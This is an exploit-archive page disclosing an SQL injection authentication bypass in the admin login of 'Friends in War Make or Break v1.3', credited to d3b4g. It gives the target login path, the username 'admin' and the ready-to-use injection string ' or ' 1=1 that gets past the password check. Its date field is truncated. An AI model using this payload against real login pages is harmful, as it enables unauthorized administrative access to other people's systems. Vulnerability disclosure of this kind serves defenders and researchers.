[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Friends in War Make or Break v1.3 SQL Injection (authbypass) Vulnerability
# Published : 2012-11-15
# Author :
# Previous Title : Wordpress FoxyPress Plugin 0.4.2.5 Multiple Vulnerabilities
# Next Title : White Label CMS v 1.5 CSRF w/ persistent XSS
# Exploit Title: friendsinwar Make or break V1.3 SQL Injection (authbypass) Vulnerability
# Date: 13.10.201
# Exploit Author: d3b4g
# Vendor Homepage: http://www.friendsinwar.com
# Software Link: http://www.friendsinwar.com/script_demo/make_or_break/admin/login.php
# Tested on: Windows 7
# Blog: d3b4g.me
----------------------------------------------------------------------------------
() SQL Injection :
http://localhost/script_demo/make_or_break/admin/login.php
+ Use following information to bypass login.
User:admin
' or ' 1=1
-end-